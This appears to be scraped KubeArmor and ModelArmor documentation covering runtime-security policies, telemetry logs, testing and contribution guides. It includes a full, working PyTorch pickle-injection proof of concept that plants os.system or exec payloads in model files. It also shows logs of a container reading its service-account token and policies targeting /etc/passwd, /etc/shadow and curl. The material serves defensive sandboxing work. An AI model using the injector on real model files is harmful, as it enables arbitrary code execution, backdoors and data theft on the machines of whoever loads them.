Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
Loading...
ModelArmor uses KubeArmor as a sandboxing engine to ensure that the untrusted models execution is constrained and within required checks. AI/ML Models are essentially processes and allowing untrusted models to execute in AI environments have significant risks such as possibility of cryptomining attacks leveraging GPUs, remote command injections, etc. KubeArmor's preemptive mitigation mechanism provides a suitable framework for constraining the execution environment of models.
ModelArmor can be used to enforce security policies on the model execution environment.
KubeArmor is a cloud-native runtime security enforcement system that restricts the behavior (such as process execution, file access, and networking operations) of pods, containers, and nodes (VMs) at the system level.
KubeArmor leverages Linux security modules (LSMs) such as AppArmor, SELinux, or BPF-LSM to enforce the user-specified policies. KubeArmor generates rich alerts/telemetry events with container/pod/namespace identities by leveraging eBPF.
💪
⛓️ Protect critical paths such as cert bundles 📋 MITRE, STIGs, CIS based rules 🛅 Restrict access to raw DB table
💍
🚥 Process Whitelisting 🚥 Network Whitelisting 🎛️ Control access to sensitive assets
🔭
🧬 Process execs, File System accesses 🧭 Service binds, Ingress, Egress connections 🔬 Sensitive system call profiling
❄️
☸️ Kubernetes Deployment 🐋 Containerized Deployment 💻 VM/Bare-Metal Deployment
📜 Security Policy for Hosts/Nodes [Spec] [Examples] ... detailed documentation
❓ FAQs
🗣️ Zoom Link
📄 Minutes: Document
📆 Calendar invite: Google Calendar, ICS file
KubeArmor uses Tracee's system call utility functions.
KubeArmor is Sandbox Project of the Cloud Native Computing Foundation.
KubeArmor roadmap is tracked via KubeArmor Projects
This guide assumes you have access to a k8s cluster. If you want to try non-k8s mode, for instance systemd mode to protect/audit containers or processes on VMs/bare-metal, check here.
Check the KubeArmor support matrix to verify if your platform is supported.
helm repo add kubearmor https://kubearmor.github.io/charts
helm repo update kubearmor
helm upgrade --install kubearmor-operator kubearmor/kubearmor-operator -n kubearmor --create-namespace
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/pkg/KubeArmorOperator/config/samples/sample-config.yml
You can find more details about helm related values and configurations here.
curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin
# sudo access is needed to install it in /usr/local/bin directory. But, if you prefer not to use sudo, you can install it in a different directory which is in your PATH.
[!NOTE] kArmor CLI provides a Developer Friendly way to interact with KubeArmor Telemetry. You can stream KubeArmor telemetry independently of kArmor CLI tool and integrate it with your chosen SIEM (Security Information and Event Management) solutions. Here's a guide on how to achieve this integration. This guide assumes you have kArmor CLI to access KubeArmor Telemetry but you can view it on your SIEM tool once integrated.
kubectl create deployment nginx --image=nginx
POD=$(kubectl get pod -l app=nginx -o name)
[!NOTE]
$POD
is used to refer to the target nginx pod in many cases below.
This recipe explains how to use KubeArmor directly on a VM/Bare-Metal machine, and we tested the following steps on Ubuntu hosts.
The recipe installs kubearmor
as systemd process and karmor
cli tool to manage policies and show alerts/telemetry.
Download the latest release or KubeArmor.
Install KubeArmor (VER is the kubearmor release version)
sudo apt --no-install-recommends install ./kubearmor_${VER}_linux-amd64.deb
Note that the above command doesn't installs the recommended packages, as we ship object files along with the package file. In case you don't have BTF, consider removing
--no-install-recommends
flag.
sudo systemctl start kubearmor
Check the status of KubeArmor using sudo systemctl status kubearmor
or use sudo journalctl -u kubearmor -f
to continuously monitor kubearmor logs.
Following policy is to deny execution of sleep
binary on the host:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: hsp-kubearmor-dev-proc-path-block
spec:
nodeSelector:
matchLabels:
kubearmor.io/hostname: "*" # Apply to all hosts
process:
matchPaths:
- path: /usr/bin/sleep # try sleep 1
action:
Block
Save the above policy to hostpolicy.yaml
and apply:
karmor vm policy add hostpolicy.yaml
Now if you run sleep
command, the process would be denied execution.
Note that
sleep
may not be blocked if you run it in the same terminal where you apply the above policy. In that case, please open a new terminal and runsleep
again to see if the command is blocked.
karmor logs --gRPC=:32767 --json
{
"Timestamp":1717259989,
"UpdatedTime":"2024-06-01T16:39:49.360067Z",
"HostName":"kubearmor-dev",
"HostPPID":1582,
"HostPID":2420,
"PPID":1582,
"PID":2420,
"UID":1000,
"ParentProcessName":"/usr/bin/bash",
"ProcessName":"/usr/bin/sleep",
"PolicyName":"hsp-kubearmor-dev-proc-path-block",
"Severity":"1",
"Type":"MatchedHostPolicy",
"Source":"/usr/bin/bash",
"Operation":"Process",
"Resource":"/usr/bin/sleep",
"Data":"lsm=SECURITY_BPRM_CHECK",
"Enforcer":"BPFLSM",
"Action":"Block",
"Result":"Permission denied",
"Cwd":"/"
}
karmor profile
provides a real-time terminal UI that visualizes security-relevant activity observed by KubeArmor, including Process, File, and Network events. It fetches live data from the KubeArmor logs API, displays counters and key details for each event type, and supports easy navigation and filtering.
karmor profile
The karmor profile
command allows you to filter logs or alerts using a set of useful flags. These filters help narrow down the output to specific Kubernetes objects like containers, pods, and namespaces.
-c
, --container
Filters logs by container name.
-n
, --namespace
Filters logs by Kubernetes namespace.
--pod
Filters logs by pod name.
karmor profile -c nginx
Outputs logs only from the container named
nginx
.
karmor profile -n nginx1
Outputs logs only from the namespace
nginx1
.
karmor profile --pod nginx-pod-1
Outputs logs only from the pod named
nginx-pod-1
.
You can combine filters to narrow down the logs even further.
karmor profile -n nginx1 -c nginx
Outputs logs only from the
nginx
container in thenginx1
namespace.
Use these filters during profiling sessions to quickly isolate behavior or security events related to a specific pod, container, or namespace.
KubeArmor helps organizations enforce a zero trust posture within their Kubernetes clusters. It allows users to define an allow-based policy that allows specific operations, and denies or audits all other operations. This helps to ensure that only authorized activities are allowed within the cluster, and that any deviations from the expected behavior are denied and flagged for further investigation.
By implementing a zero trust posture with KubeArmor, organizations can increase their security posture and reduce the risk of unauthorized access or activity within their Kubernetes clusters. This can help to protect sensitive data, prevent system breaches, and maintain the integrity of the cluster.
KubeArmor supports allow-based policies which results in specific actions to be allowed and denying/auditing everything else. For example, a specific pod/container might only invoke a set of binaries at runtime. As part of allow-based rules you can specify the set of processes that are allowed and everything else is either audited or denied based on the default security posture.
Install the nginx deployment using
kubectl create deployment nginx --image=nginx
.
Set the default security posture to default-deny.
kubectl annotate ns default kubearmor-file-posture=block --overwrite
Apply the following policy:
cat <<EOF | kubectl apply -f -
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
name: only-allow-nginx-exec
spec:
selector:
matchLabels:
app: nginx
file:
matchDirectories:
- dir: /
recursive: true
process:
matchPaths:
- path: /usr/sbin/nginx
- path: /bin/bash
action:
Allow
EOF
Observe that the policy contains Allow action. Once there is any KubeArmor policy having Allow action then the pods enter least permissive mode, allowing only explicitly allowed operations.
Note: Use kubectl port-forward $POD --address 0.0.0.0 8080:80 to access nginx and you can see that the nginx web access still works normally.
Lets try to execute some other processes:
kubectl exec -it $POD -- bash -c "chroot"
This would be permission denied.
Achieving Zero Trust Security Posture is difficult. However, the more difficult part is to maintain the Zero Trust posture across application updates. There is also a risk of application downtime if the security posture is not correctly identified. While KubeArmor provides a way to enforce Zero Trust Security Posture, identifying the policies/rules for achieving this is non-trivial and requires that you keep the policies in dry-run mode (or default audit mode) before using the default-deny mode.
KubeArmor provides framework so as to smoothen the journey to Zero Trust posture. For e.g., it is possible to set dry-run/audit mode at the namespace level by configuring security posture. Thus, you can have different namespaces in different default security posture modes (default-deny vs default-audit). Users can switch to default-deny mode once they are comfortable (i.e., they do not see any alerts) with the settings.
KubeArmor is a runtime security enforcement system for containers and nodes. It uses security policies (defined as Kubernetes Custom Resources like KSP, HSP, and CSP) to define allowed, audited, or blocked actions for workloads. The system monitors system activity using kernel technologies such as eBPF and enforces the defined policies by integrating with the underlying operating system's security modules like AppArmor, SELinux, or BPF-LSM, sending security alerts and telemetry through a log feeder.
KubeArmor has visibility into systems and application behavior. KubeArmor summarizes/aggregates the information and provides a user-friendly view to figure out the application behavior.
Process data:
What are the processes executing in the pods?
What processes are executing through which parent processes?
File data:
What are the file system accesses made by different processes?
Network Accesses:
What are the Ingress/Egress connections from the pod?
What server binds are done in the pod?
Get visibility into process executions in default
namespace.
Adversarial attacks exploit vulnerabilities in AI systems by subtly altering input data to mislead the model into incorrect predictions or decisions. These perturbations are often imperceptible to humans but can significantly degrade the system's performance.
By Model Access:
White-box Attacks: Complete knowledge of the model, including architecture and training data.
Black-box Attacks: No information about the model; the attacker probes responses to craft inputs.
By Target Objective:
Non-targeted Attacks: Push input to any incorrect class.
Targeted Attacks: Force input into a specific class.
Training Phase Attacks:
Data Poisoning: Injects malicious data into the training set, altering model behavior.
Backdoor Attacks: Embeds triggers in training data that activate specific responses during inference.
Inference Phase Attacks:
Model Evasion: Gradually perturbs input to skew predictions (e.g., targeted misclassification).
Membership Inference: Exploits model outputs to infer sensitive training data (e.g., credit card numbers).
Highly accurate models often exhibit reduced robustness against adversarial perturbations, creating a tradeoff between accuracy and security. For instance, Chen et al. found that better-performing models tend to be more sensitive to adversarial inputs.
Pre-analysis: Test models for prompt injection vulnerabilities using techniques like fuzzing.
Input Sanitation:
Validation: Enforce strict input rules (e.g., character and data type checks).
Filtering: Strip malicious scripts or fragments.
Encoding: Convert special characters to safe representations.
Secure Practices for Model Deployment:
Restrict model permissions.
Regularly update libraries to patch vulnerabilities.
Detect injection attempts with specialized tooling.
Python's pickle
module allows serialization and deserialization but lacks security checks. Attackers can exploit this to execute arbitrary code using crafted payloads. The module’s inherent insecurity makes it risky to use with untrusted inputs.
Mitigation:
Avoid using pickle
with untrusted sources.
Use secure serialization libraries like json
or protobuf
.
karmor logs -n default --json --logFilter all --operation process
{
"Timestamp": 1686491023,
"UpdatedTime": "2023-06-11T13:43:43.289380Z",
"ClusterName": "default",
"HostName": "ip-172-31-24-142",
"NamespaceName": "default",
"PodName": "nginx-8f458dc5b-fl42t",
"Labels": "app=nginx",
"ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
"ContainerName": "nginx",
"ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
"ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
"ProcessName": "/bin/sh",
"HostPPID": 3488352,
"HostPID": 3488357,
"PPID": 3488352,
"PID": 832,
"Type": "ContainerLog",
"Source": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
"Operation": "Process",
"Resource": "/bin/sh -c cat /run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
{
"Timestamp": 1686491023,
"UpdatedTime": "2023-06-11T13:43:43.291471Z",
"ClusterName": "default",
"HostName": "ip-172-31-24-142",
"NamespaceName": "default",
"PodName": "nginx-8f458dc5b-fl42t",
"Labels": "app=nginx",
"ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
"ContainerName": "nginx",
"ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
"ParentProcessName": "/bin/dash",
"ProcessName": "/bin/cat",
"HostPPID": 3488357,
"HostPID": 3488363,
"PPID": 832,
"PID": 838,
"Type": "ContainerLog",
"Source": "/bin/dash",
"Operation": "Process",
"Resource": "/bin/cat /run/secrets/kubernetes.io/serviceaccount/token",
"Data": "syscall=SYS_EXECVE",
"Result": "Passed"
}
The Pickle Code Injection Proof of Concept (PoC) demonstrates the security vulnerabilities in Python's pickle
module, which can be exploited to execute arbitrary code during deserialization. This method is inherently insecure because it allows execution of arbitrary functions without restrictions or security checks.
Custom Pickle Injector:
import os, argparse, pickle, struct, shutil
from pathlib import Path
import torch
class PickleInject:
def __init__(self, inj_objs, first=True):
self.inj_objs = inj_objs
self.first = first
class _Pickler(pickle._Pickler):
def __init__(self, file, protocol, inj_objs, first=True):
super().__init__(file, protocol)
self.inj_objs = inj_objs
self.first = first
def dump(self, obj):
if self.proto >= 2:
self.write(pickle.PROTO + struct.pack("<B", self.proto))
if self.first:
for inj_obj in self.inj_objs:
self.save(inj_obj)
self.save(obj)
if not self.first:
for inj_obj in self.inj_objs:
self.save(inj_obj)
self.write(pickle.STOP)
def Pickler(self, file, protocol):
return self._Pickler(file, protocol, self.inj_objs)
class _PickleInject:
def __init__(self, args, command=None):
self.command = command
self.args = args
def __reduce__(self):
return self.command, (self.args,)
class System(_PickleInject):
def __init__(self, args):
super().__init__(args, command=os.system)
class Exec(_PickleInject):
def __init__(self, args):
super().__init__(args, command=exec)
class Eval(_PickleInject):
def __init__(self, args):
super().__init__(args, command=eval)
class RunPy(_PickleInject):
def __init__(self, args):
import runpy
super().__init__(args, command=runpy._run_code)
def __reduce__(self):
return self.command, (self.args, {})
# Parse Arguments
parser = argparse.ArgumentParser(description="PyTorch Pickle Inject")
parser.add_argument("model", type=Path)
parser.add_argument("command", choices=["system", "exec", "eval", "runpy"])
parser.add_argument("args")
args = parser.parse_args()
# Payload construction
command_args = args.args
if os.path.isfile(command_args):
with open(command_args, "r") as in_file:
command_args = in_file.read()
if args.command == "system":
payload = PickleInject.System(command_args)
elif args.command == "exec":
payload = PickleInject.Exec(command_args)
elif args.command == "eval":
payload = PickleInject.Eval(command_args)
elif args.command == "runpy":
payload = PickleInject.RunPy(command_args)
# Save the injected payload
backup_path = f"{args.model}.bak"
shutil.copyfile(args.model, backup_path)
torch.save(torch.load(args.model), f=args.model, pickle_module=PickleInject([payload]))
Print Injection:
python torch_pickle_inject.py model.pth exec "print('hello')"
Install Packages:
python torch_pickle_inject.py model.pth system "pip install numpy"
Adversarial Command Execution: Upon loading the tampered model:
python main.py
Output:
Installs the package or executes the payload.
Alters model behavior: changes predictions, losses, etc.
Spreading Malware: The injected code can download and install malware on the target machine, which can then be used to infect other systems in the network or create a botnet.
Backdoor Installation: An attacker can use pickle injection to install a backdoor that allows persistent access to the system, even if the original vulnerability is patched.
Data Exfiltration: An attacker can use pickle injection to read sensitive files or data from the system and send it to a remote server. This can include configuration files, database credentials, or any other sensitive information stored on the machine.
The pickle
module is inherently insecure for handling untrusted input due to its ability to execute arbitrary code.
There are two ways to check the functionalities of KubeArmor: 1) testing KubeArmor manually and 2) using the testing framework.
Although there are many ways to run a Kubernetes cluster (like minikube or kind), it will not work with locally developed KubeArmor. KubeArmor needs to be on the same node as where the Kubernetes nodes exist. If you try to do this it will not identify your node since minikube and kind use virtualized nodes. You would either need to build your images and deploy them into these clusters or you can simply use k3s
or kubeadm
for development purposes. If you are new to these terms then the easiest way to do this is by following this guide:
Beforehand, check if the KubeArmorPolicy and KubeArmorHostPolicy CRDs are already applied.
If they are still not applied, do so.
Now you can apply specific policies.
You can refer to security policies defined for example microservices in .
Watch alerts using cli tool
flags:
Note that you will see alerts and logs generated right after karmor
runs logs; thus, we recommend to run the above command in other terminal to see logs live.
The case that KubeArmor is directly running in a host
Compile KubeArmor
Run the auto-testing framework
Check the test report
The case that KubeArmor is running as a daemonset in Kubernetes
Run the testing framework
Check the test report
To run a specific suit of tests move to the directory of test and run
$ kubectl proxy &
~/KubeArmor/KubeArmor$ make run
$ kubectl proxy &
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make
~/KubeArmor/KubeArmor$ sudo -E ./kubearmor -gRPC=[gRPC port number]
-logPath=[log file path]
-enableKubeArmorPolicy=[true|false]
-enableKubeArmorHostPolicy=[true|false]
$ kubectl explain KubeArmorPolicy
$ kubectl apply -f ~/KubeArmor/deployments/CRD/
$ kubectl apply -f [policy file]
$ kubectl -n [namespace name] exec -it [pod name] -- bash -c [command]
$ karmor log [flags]
--gRPC string gRPC server information
--help help for log
--json Flag to print alerts and logs in the JSON format
--logFilter string What kinds of alerts and logs to receive, {policy|system|all} (default "policy")
--logPath string Output location for alerts and logs, {path|stdout|none} (default "stdout")
--msgPath string Output location for messages, {path|stdout|none} (default "none")
$ cd KubeArmor/KubeArmor
~/KubeArmor/KubeArmor$ make clean && make
$ cd KubeArmor/tests
~/KubeArmor/tests$ ./test-scenarios-local.sh
~/KubeArmor/tests$ cat /tmp/kubearmor.test
$ cd KubeArmor/tests
~/KubeArmor/tests$ ./test-scenarios-in-runtime.sh
~/KubeArmor/tests$ cat /tmp/kubearmor.test
~/KubeArmor/tests/test_directory$ ginkgo --focus "Suit_Name"
Here, we demonstrate how to define host security policies.
Process Execution Restriction
Block a specific executable (hsp-kubearmor-dev-proc-path-block.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: hsp-kubearmor-dev-proc-path-block
spec:
nodeSelector:
matchLabels:
kubernetes.io/hostname: kubearmor-dev
severity: 5
process:
matchPaths:
- path: /usr/bin/diff
action:
Block
Explanation: The purpose of this policy is to block the execution of '/usr/bin/diff' in a host whose host name is 'kubearmor-dev'. For this, we define 'kubernetes.io/hostname: kubearmor-dev' in nodeSelector -> matchLabels and the specific path ('/usr/bin/diff') in process -> matchPaths. Also, we put 'Block' as the action of this policy.
Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run '/usr/bin/diff'. You will see that /usr/bin/diff is blocked.
NOTE
The given policy works with almost every linux distribution. If it is not working in your case, check the process location. The following location shows location of sleep
binary in different ubuntu distributions:
In case of Ubuntu 20.04 : /usr/bin/sleep
In case of Ubuntu 18.04 : /bin/sleep
File Access Restriction
Audit a critical file access (hsp-kubearmor-dev-file-path-audit.yaml)
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: hsp-kubearmor-dev-file-path-audit
spec:
nodeSelector:
matchLabels:
kubernetes.io/hostname: kubearmor-dev
severity: 5
file:
matchPaths:
- path: /etc/passwd
action:
Audit
Explanation: The purpose of this policy is to audit any accesses to a critical file (i.e., '/etc/passwd'). Since we want to audit one critical file, we use matchPaths to specify the path of '/etc/passwd'.
Verification: After applying this policy, please open a new terminal (or connect to the host with a new session) and run 'sudo cat /etc/passwd'. Then, check the alert logs of KubeArmor.
System calls alerting
Alert for all unlink
syscalls
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: audit-all-unlink
spec:
severity: 3
nodeSelector:
matchLabels:
kubernetes.io/hostname: vagrant
syscalls:
matchSyscalls:
- syscall:
- unlink
action:
Audit
Alert on all rmdir
syscalls targeting anything in /home/
directory and sub-directories
apiVersion: security.kubearmor.com/v1
kind: KubeArmorHostPolicy
metadata:
name: audit-home-rmdir
spec:
severity: 3
nodeSelector:
matchLabels:
kubernetes.io/hostname: vagrant
syscalls:
matchPaths:
- syscall:
- rmdir
path: /home/
recursive: true
action:
Audit
Welcome to the KubeArmor tutorial! In this first chapter, we'll dive into one of the most fundamental concepts in KubeArmor: Security Policies. Think of these policies as the instruction manuals or rulebooks you give to KubeArmor, telling it exactly how applications and system processes should behave.
In any secure system, you need rules that define what is allowed and what isn't. In Kubernetes and Linux, these rules can get complicated, dealing with things like which files a program can access, which network connections it can make, or which powerful system features (capabilities) it's allowed to use.
KubeArmor simplifies this by letting you define these rules using clear, easy-to-understand Security Policies. You write these policies in a standard format that Kubernetes understands (YAML files, using something called Custom Resource Definitions or CRDs), and KubeArmor takes care of translating them into the low-level security configurations needed by the underlying system.
These policies are powerful because they allow you to specify security rules for different parts of your system:
KubeArmorPolicy (KSP): For individual Containers or Pods running in your Kubernetes cluster.
KubeArmorHostPolicy (HSP): For the Nodes (the underlying Linux servers) where your containers are running. This is useful for protecting the host system itself, or even applications running directly on the node outside of Kubernetes.
KubeArmorClusterPolicy (CSP): For applying policies across multiple Containers/Pods based on namespaces or labels cluster-wide.
Imagine you have a web server application running in a container. This application should only serve web pages and access its configuration files. It shouldn't be trying to access sensitive system files like /etc/shadow
or connecting to unusual network addresses.
Without security policies, if your web server container gets compromised, an attacker might use it to access or modify sensitive data, or even try to attack other parts of your cluster or network.
KubeArmor policies help prevent this by enforcing the principle of least privilege. This means you only grant your applications and host processes the minimum permissions they need to function correctly.
Use Case Example: Let's say you have a simple application container that should never be allowed to read the /etc/passwd
file inside the container. We can use a KubeArmor Policy (KSP) to enforce this rule.
KubeArmor policies are defined as YAML files that follow a specific structure. This structure includes:
Metadata: Basic information about the policy, like its name
. For KSPs, you also specify the namespace
it belongs to. HSPs and CSPs are cluster-scoped, meaning they don't belong to a specific namespace.
Selector: This is how you tell KubeArmor which containers, pods, or nodes the policy should apply to. You typically use Kubernetes labels for this.
Spec (Specification): This is the core of the policy where you define the actual security rules (what actions are restricted) and the desired outcome (Allow, Audit, or Block).
Let's look at a simplified structure:
apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy # or KubeArmorHostPolicy, KubeArmorClusterPolicy
metadata:
name: block-etc-passwd-read
namespace: default # Only for KSP
spec:
selector:
# How to select the targets (pods for KSP, nodes for HSP, namespaces/labels for CSP)
matchLabels:
app: my-web-app # Apply this policy to pods with label app=my-web-app
file: # Or 'process', 'network', 'capabilities', 'syscalls'
matchPaths:
- path: /etc/passwd
action: Block # What to do if the rule is violated
Explanation:
apiVersion
and kind
: Identify this document as a KubeArmor Policy object.
metadata
: Gives the policy a name (block-etc-passwd-read
) and specifies the namespace (default
) it lives in (for KSP).
spec
: Contains the security rules.
selector
: Uses matchLabels
to say "apply this policy to any Pod in the default
namespace that has the label app: my-web-app
".
file
: This section defines rules related to file access.
matchPaths
: We want to match a specific file path.
- path: /etc/passwd
: The specific file we are interested in.
action: Block
: If any process inside the selected containers tries to access /etc/passwd
, the action should be to Block
that attempt.
This simple policy directly addresses our use case: preventing the web server (app: my-web-app
) from reading /etc/passwd
.
Let's break down the three types:
KubeArmorPolicy
KSP
Containers / Pods (Scoped by Namespace)
matchLabels
, matchExpressions
KubeArmorHostPolicy
HSP
Nodes / Host OS
nodeSelector
(matchLabels
)
KubeArmorClusterPolicy
CSP
Containers / Pods (Cluster-wide)
selector
(matchExpressions
on namespace
or label
)
KubeArmorPolicy (KSP)
Applies to pods within a specific Kubernetes namespace.
Uses selector.matchLabels
or selector.matchExpressions
to pick which pods the policy applies to, based on their labels.
Example: Block /bin/bash
execution in all pods within the dev
namespace labeled role=frontend
.
KubeArmorHostPolicy (HSP)
Applies to the host operating system of the nodes in your cluster.
Uses nodeSelector.matchLabels
to pick which nodes the policy applies to, based on node labels.
Example: Prevent the /usr/bin/ssh
process on nodes labeled node-role.kubernetes.io/worker
from accessing /etc/shadow
.
KubeArmorClusterPolicy (CSP)
Applies to pods across multiple namespaces or even the entire cluster.
Uses selector.matchExpressions
which can target namespaces (key: namespace
) or labels (key: label
) cluster-wide.
Example: Audit all network connections made by pods in the default
or staging
namespaces. Or, block /usr/bin/curl
execution in all pods across the cluster except those labeled app=allowed-tools
.
These policies become Kubernetes Custom Resources when KubeArmor is installed. You can see their definitions in the KubeArmor source code under the deployments/CRD
directory:
KubeArmorPolicy CRD (KSP)
KubeArmorHostPolicy CRD (HSP)
And their corresponding Go type definitions are in types/types.go. You don't need to understand Go or CRD internals right now, just know that these files formally define the structure and rules for creating KubeArmor policies that Kubernetes understands.
You've written a policy YAML file. What happens when you apply it to your Kubernetes cluster using kubectl apply -f your-policy.yaml
?
Policy Creation: You create the policy object in the Kubernetes API Server.
KubeArmor Watches: The KubeArmor DaemonSet (a component running on each node) is constantly watching the Kubernetes API Server for KubeArmor policy objects (KSP, HSP, CSP).
Policy Discovery: KubeArmor finds your new policy.
Target Identification: KubeArmor evaluates the policy's selector
(or nodeSelector
) to figure out exactly which pods/containers or nodes this policy applies to.
Translation: For each targeted container or node, KubeArmor translates the high-level rules defined in the policy's spec
(like "Block access to /etc/passwd
") into configurations for the underlying security enforcer (which could be AppArmor, SELinux, or BPF, depending on your setup and KubeArmor's configuration - we'll talk more about these later).
Enforcement: The security enforcer on that specific node is updated with the new low-level rules. Now, if a targeted process tries to do something forbidden by the policy, the enforcer steps in to Allow
, Audit
, or Block
the action as specified.
Here's a simplified sequence:
This flow shows how KubeArmor acts as the bridge between your easy-to-write YAML policies and the complex, low-level security mechanisms of the operating system.
Every rule in a KubeArmor policy (within the spec
section) specifies an action
. This tells KubeArmor what to do if the rule's condition is met.
Allow: Explicitly permits the action. This is useful for creating "whitelist" policies where you only allow specific behaviors and implicitly block everything else.
Audit: Does not prevent the action but generates a security alert or log message when it happens. This is great for testing policies before enforcing them or for monitoring potentially suspicious activity without disrupting applications.
Block: Prevents the action from happening and generates a security alert. This is for enforcing strict "blacklist" rules where you explicitly forbid certain dangerous behaviors.
Remember the "Note" mentioned in the provided policy specifications: For system call monitoring (syscalls
), KubeArmor currently only supports the Audit
action, regardless of what is specified in the policy YAML.
In this chapter, you learned that KubeArmor Security Policies (KSP, HSP, CSP) are your rulebooks for defining security posture in your Kubernetes environment. You saw how they use Kubernetes concepts like labels and namespaces to target specific containers, pods, or nodes. You also got a peek at the basic structure of these policies, including the selector for targeting and the spec for defining rules and actions.
Understanding policies is the first step to using KubeArmor effectively to protect your workloads and infrastructure. In the next chapter, we'll explore how KubeArmor identifies the containers and nodes it is protecting, which is crucial for the policy engine to work correctly.
KubeArmor maintainers welcome individuals and organizations from across the cloud security landscape (creators and implementers alike) to make contributions to the project. We equally value the addition of technical contributions and enhancements of documentation that helps us grow the community and strengthen the value of KubeArmor. We invite members of the community to contribute to the project!
To make a contribution, please follow the steps below.
Fork this repository (KubeArmor)
First, fork this repository by clicking on the Fork button (top right).
Then, click your ID on the pop-up screen.
This will create a copy of KubeArmor in your account.
Clone the repository
Now clone Kubearmor locally into your dev environment.
$ git clone https://github.com/[your GitHub ID]/KubeArmor
This will clone a copy of Kubearmor installed in your dev environment.
Make changes
First, go into the repository directory and make some changes.
Please refer to development guide to set up your environment for KubeArmor contribution.
Check the changes
If you have changed the core code of KubeArmor then please run tests before committing the changes
cd tests
~/KubeArmor/tests$ make
If you see any warnings or errors, please fix them first.
If some tests are failing, then fix them by following Testing Guide
If you have made changes in Operator or Controller, then follow this
Commit changes
Please see your changes using "git status" and add them to the branch using "git add".
$ cd KubeArmor
~/KubeArmor$ git status
~/KubeArmor$ git add [changed file]
Then, commit the changes using the "git commit" command.
~/KubeArmor$ git commit -s -m "Add a new feature by [your name]"
Please make sure that your changes are properly tested on your machine.
Push changes to your forked repository
Push your changes using the "git push" command.
~/KubeArmor$ git push
Create a pull request with your changes with the following steps
First, go to your repository on GitHub.
Then, click "Pull request" button.
After checking your changes, click 'Create pull request'.
A pull request should contain the details of all commits as specific as possible, including "Fixes: #(issue number)".
Finally, click the "Create pull request" button.
The changes would be merged post a review by the respective module owners. Once the changes are merged, you will get a notification, and the corresponding issue will be closed.
DCO Signoffs
To ensure that contributors are only submitting work that they have rights to, we are requiring everyone to acknowledge this by signing their work. Any copyright notices in this repo should specify the authors as "KubeArmor authors".
To sign your work, just add a line like this at the end of your commit message:
Signed-off-by: FirstName LastName <[email protected]>
This can easily be done with the -s
or --signoff
option to git commit
.
By doing this, you state that the source code being submitted originated from you (see https://developercertificate.org).
KubeArmor currently supports enabling visibility for containers and hosts.
Visibility for hosts is not enabled by default, however it is enabled by default for containers .
The karmor
tool provides access to both using karmor logs
.
If you don't have access to a K8s cluster, please follow to set one up.
karmor CLI tool:
To deploy app follow
Now we need to deploy some sample policies
This sample policy blocks execution of the apt
and apt-get
commands in wordpress pods with label selector app: wordpress
.
Checking default visibility
Container visibility is enabled by default. We can check it using kubectl describe
and grep kubearmor-visibility
For pre-existing workloads : Enable visibility using kubectl annotate
. Currently KubeArmor supports process
, file
, network
, capabilities
Open up a terminal, and watch logs using the karmor
cli
In another terminal, simulate a policy violation . Try sleep
inside a pod
In the terminal running karmor logs
, the policy violation along with container visibility is shown, in this case for example
The logs can also be generated in JSON format using karmor logs --json
Host Visibility is not enabled by default . To enable Host Visibility we need to annotate the node using kubectl annotate node
To confirm it use kubectl describe
and grep kubearmor-visibility
Now we can get general telemetry events in the context of the host using karmor logs
.The logs related to Host Visibility will have type Type: HostLog
and Operation: File | Process | Network
KubeArmor has the ability to let the user select what kind of events have to be traced by changing the annotation kubearmor-visibility
at the namespace.
Checking Namespace visibility
Namespace visibility can be checked using kubectl describe
.
To update the visibility of namespace : Now let's update Kubearmor visibility using kubectl annotate
. Currently KubeArmor supports process
, file
, network
, capabilities
.
Lets try to update visibility for the namespace wordpress-mysql
Note: To turn off the visibility across all aspects, use
kubearmor-visibility=none
. Note that any policy violations or events that results in non-success returns would still be reported in the logs.
Open up a terminal, and watch logs using the karmor
cli
In another terminal, let's exec into the pod and run some process commands . Try ls
inside the pod
Now, we can notice that no logs have been generated for the above command and logs with only Operation: Network
are shown.
Note If telemetry is disabled, the user wont get audit event even if there is an audit rule.
Note Only the logs are affected by changing the visibility, we still get all the alerts that are generated.
Let's simulate a sample policy violation, and see whether we still get alerts or not.
Policy violation :
Here, note that the alert with Operation: Process
is reported.
kubectl apply -f https://raw.githubusercontent.com/kubearmor/KubeArmor/main/examples/wordpress-mysql/security-policies/ksp-wordpress-block-process.yaml
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl describe -n wordpress-mysql pod $POD_NAME | grep kubearmor-visibility
kubearmor-visibility: process, file, network, capabilities
kubectl annotate pods <pod-name> -n wordpress-mysql "kubearmor-visibility=process,file,network,capabilities"
karmor logs
POD_NAME=$(kubectl get pods -n wordpress-mysql -l app=wordpress -o jsonpath='{.items[0].metadata.name}') && kubectl -n wordpress-mysql exec -it $POD_NAME -- bash
# apt update
kubectl annotate node <node-name> "kubearmor-visibility=process,file,network,capabilities"
kubectl describe node <node-name> | grep kubearmor-visibility
karmor logs --logFilter=all
